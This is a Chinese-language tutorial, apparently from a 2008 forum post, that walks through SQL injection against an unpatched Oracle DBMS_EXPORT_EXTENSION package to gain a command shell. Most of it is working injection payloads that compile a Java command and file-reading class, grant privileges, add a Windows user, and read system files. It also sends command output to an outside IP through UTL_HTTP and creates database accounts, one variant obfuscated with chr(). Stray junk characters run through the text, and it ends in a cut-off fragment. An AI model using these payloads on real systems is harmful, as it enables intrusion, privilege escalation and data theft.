
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在 web 上的 SQL*Plus 中执行的；在 web 注入时，把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) * v, |. r- g5 c* {+ d/ _3 D
的形式即可。（用 'a'|| 是为了让语句返回 true 值。）
语句有点长，可能要用 POST 提交。
以下是各个步骤（这些步骤都依赖目标库上的 SYS.DBMS_EXPORT_EXTENSION 未打补丁且仍对 PUBLIC 可执行；已修补的版本会直接失败）：
1. 创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在 Oracle 上创建 Java 包 LinxUtil，里面有两个函数：runCMD 用于执行系统命令，readFile 用于读取文件：
/xxx.jsp?id=1 and '1'<>'a'||(
+ @. t8 {4 v% c5 K/ y. x0 `2 }2 dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 m2 s0 W  Z8 j! L: p$ X
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
3 y, h" k8 |( G% m9 nnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}/ s" P. Q" T$ G& Z% j7 M
}'''';END;'';END;--','SYS',0,'1',0) from dual
------------------------
如果 URL 有长度限制，可以把 readFile() 函数块去掉，即：
0 W7 x/ d/ l2 t! Z3 K; [$ w/xxx.jsp?id=1 and '1'<>'a'||(
% T0 D4 c/ x: e  W) ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ ?+ G; t6 K8 ], }( n% P7 ^3 ]create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(& I0 l. g. J4 h
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
& u# i+ O3 o0 u7 B% h}'''';END;'';END;--','SYS',0,'1',0) from dual / w$ Z5 [- i' y2 }: O( H
) % j% k3 F2 {) Z& ]( e# T
同时把后面步骤中提到的对 readFile() 的处理语句去掉。
------------------------------
2. 赋 Java 权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. 创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
/ P0 M+ j3 K3 b, g! C" j( t; Vcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
3 u% L; m# q& k9 _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. e: W: h; {: H& g8 acreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual" b. }% u& ^' f9 Y/ n2 ~
4. 赋 public 执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
. U- p2 L+ W- [: M& s5 Lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual6 X$ ]( W' G/ v* e
5.测试上面的几步是否成功
/ @9 I3 S. B1 Vand '1'<>'11'||(
5 h7 R  K$ W" n  }5 Oselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 3 F2 u% j" x0 `3 k/ n, n
)
0 |9 h0 G) m$ p, Q  aand '1'<>( ' {4 o1 [; N- R: x
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
/ t5 H% o$ I( k& S, ]* L) c) % ?9 a9 A1 h; b  j
6.执行命令:
0 F5 u5 X7 B' n. c/xxx.jsp?id=1 and '1'<>( # t2 f* U( b5 L+ [
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual , F9 e6 Q3 G  Q+ `; ?
# }4 ]: d6 ]7 l0 `
) 4 H4 S% M6 U9 D. G
/xxx.jsp?id=1 and '1'<>(   L: f% S+ D' @7 v9 C
select  sys.LinxReadFile('c:/boot.ini') from dual. }. F( n+ A! d. A$ P

& }+ L' ]# j0 |)
8 a1 X' K3 ]5 v9 S% [/ E  7 A% ~7 g: C, c* A
注意：sys.LinxReadFile() 返回的是 varchar 类型，不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果，可以用 union：
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request()：
9 Q+ T' y$ p$ ?, l/xxx.jsp?id=1 and '1'<>(
8 j2 j# T, X: D  V# U" |8 eSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual) J' O  M! N% Y( t; v$ B# }, Y
)
; G: q5 m+ C# A( e0 a/xxx.jsp?id=1 and '1'<>(
7 ?* n* Z& |& |# T4 JSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual0 ], m6 B; T% B6 T  |
) ' Y3 f# h+ q+ {$ u( ]" I
注意：用 UTL_HTTP.request 时，要用 REPLACE() 把空格、换行符替换掉，否则无法提交 HTTP request。用 utl_encode.base64_encode 也可以。
--------------------
6. 内部变化
通过以下命令可以查看 all_objects 表的改变：
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'; m- E* v6 {5 O
7. 删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 k0 \& U  T% r1 d' f
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ! {) J3 I' L; \- M
====================================================
全文结束。谨以此文赠与我的朋友。
linx ! y; A7 s( ]8 ^: G
124829445 - y8 t! v: |) I/ r( e: ~
2008.1.12
7 e! p( U3 @- \. Wlinyujian@bjfu.edu.cn . X, y) E/ Y- b- `) q) K& X
======================================================================
测试漏洞的另一方法：
创建 Oracle 帐号：
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 R6 m2 r3 N( iCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual% K* l$ e( M: W2 i8 a' E: {/ K, B. b% u, ?
即：
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
: c  W6 C4 c& ]. s8 l! ]0 [* ]( R  @chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在：
1<>(
3 ]/ W+ j! u/ Z7 n' F* G. ?3 C. uselect user_id from all_users where username='LINXSQL' # h% [+ @& p6 O+ o4 L1 ^# I9 F. U7 n
) # p' \2 w" r& z  h& c7 W$ C/ f
给 linxsql 连接权限：
, m8 \: ^. X9 Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% |! Y1 e: G/ `, Y  j, p7 |GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号：
! L# J9 D# T8 Q, B4 G2 Q; g5 ^  Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% P" l2 D' Q+ c8 e9 m& v5 sdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数 Linx_query()，执行成功的话返回数值 "1"；但权限是继承的，可能仅仅是 public 权限，作用似乎不大。真的要用的话可以考虑 grant dba to 当前的 User：
8 d& S- K/ ~1 s1.jsp?id=1 and '1'<>(
& ~# Z: K* o; b' X* W$ ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''', k, U) A9 J' }; ?6 g
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
' e2 I& d: S: L+ x" m: P) m$ q; a7 _) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE: S# [& q, a* c% \, }. `2 m9 A7 w
 )9 o; `+ T& c7 c9 K8 g

4 u" u) ]6 V1 b. {1 V# s, h7 C: M) o5 y5 Q' O

/ q1 B: A6 d/ P* A  V) _& w& Z! v; k